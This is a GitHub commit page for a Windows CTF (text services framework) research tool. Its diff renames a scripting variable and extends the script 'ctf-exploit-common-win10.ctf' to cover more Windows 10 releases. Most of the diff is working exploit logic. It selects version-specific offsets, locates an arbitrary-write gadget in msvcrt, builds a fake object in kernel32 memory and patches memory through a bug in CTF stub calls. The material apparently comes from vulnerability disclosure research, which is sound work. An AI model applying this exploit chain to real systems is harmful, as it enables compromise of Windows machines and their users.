Skip to content
Permalink
Browse files

support more win10 versions

  • Loading branch information...
taviso committed Jul 12, 2019
1 parent 1e73fbe commit a77d46a8a7bc6baf554159752ba7480c32857cfd
Showing with 25 additions and 12 deletions.
  1. +3 −4 command.c
  2. +1 −1 commanddoc.h
  3. +21 −7 scripts/ctf-exploit-common-win10.ctf
@@ -135,7 +135,7 @@ ULONGLONG DecodeIntegerParameter(PCHAR Value) {
{ "rc", "Return code of last run command.", LastCommandResult },
{ "regval", "The last value queried from the registry.", LastRegistryValue },
{ "gadget", "Result of the last gadget found.", LastGadget },
{ "section", "Result of the last section property query.", LastSectionResult }
{ "secval", "Result of the last section property query.", LastSectionResult }
};

// Check if the caller is requesting help.
@@ -1436,12 +1436,11 @@ ULONG RegHandler(PCHAR Command, ULONG ParamCount, PCHAR *Parameters)

if (Result != ERROR_SUCCESS) {
LogMessage(stdout, "Failed to query %s, %#x", Subkey, Result);
LastRegistryValue = -1;
return 1;
}

if (!NonInteractive) {
LogMessage(stdout, "%s is %u", Parameters[1], Value);
}
LogMessage(stdout, "%s is %u", Parameters[1], Value);

LastRegistryValue = Value;

@@ -409,7 +409,7 @@ static const char SectionDoc[] =
"Parse the section header of MODULE, find a section named SECTIONNAME and\n"
"print the value of PROPERTY. PROPERTY should be a member of\n"
"IMAGE_SECTION_HEADER, such as VirtualAddress.\n\n"
"The result is stored in the section variable for scripting.\n\n"
"The result is stored in the secval variable for scripting.\n\n"
"Examples:\n"
" ctf> section kernel32 .text PointerToRawData\n";

@@ -6,6 +6,8 @@
# 00007ffd`1aee6440 MSCTF!CTipProxy::Reconvert
reg HKLM ReleaseId SOFTWARE\Microsoft\Windows NT\CurrentVersion

set r3 475

set r0 1903
eq r0 regval
repeat r0 set r3 480
@@ -14,6 +16,18 @@ set r0 1809
eq r0 regval
repeat r0 set r3 496

set r0 1803
eq r0 regval
repeat r0 set r3 553

set r0 1709
eq r0 regval
repeat r0 set r3 452

set r0 1703
eq r0 regval
repeat r0 set r3 401

# Find offset of msvcrt!_init_time from msvcrt base. This is our arbitrary write
# gadget.
gadget msvcrt 48895C240848896C2410574883EC2083
@@ -22,15 +36,15 @@ set r4 gadget
# We need to adjust the offset based on the section headers to guess where it
# will be loaded.
section msvcrt .text VirtualAddress
add r4 section
add r4 secval
section msvcrt .text PointerToRawData
sub r4 section
sub r4 secval

# Offset of slack space in kernel32 .data section. This is where we build our
# fake object in memory. It doesn't have to be kernel32, any module with some
# writable space that is always zero is fine.
section kernel32 .data VirtualAddress
set r5 section
set r5 secval
add r5 0x1008

# There is a bug in how methods are called on what CTF calls "stubs", essentially
@@ -195,9 +209,9 @@ add r2 gadget

# Adjust the file offset based on the section headers.
section msctf .text VirtualAddress
add r2 section
add r2 secval
section msctf .text PointerToRawData
sub r2 section
sub r2 secval

# Alright, lets paste this sucker in.
patch 0 0xa8 r0 8 -0x158
@@ -541,9 +555,9 @@ set r1 gadget

# Adjust the file offset based on the section headers.
section combase .text VirtualAddress
add r1 section
add r1 secval
section combase .text PointerToRawData
sub r1 section
sub r1 secval

patch 0 0x40 module 8 r1

0 comments on commit a77d46a

Please sign in to comment.
You can’t perform that action at this time.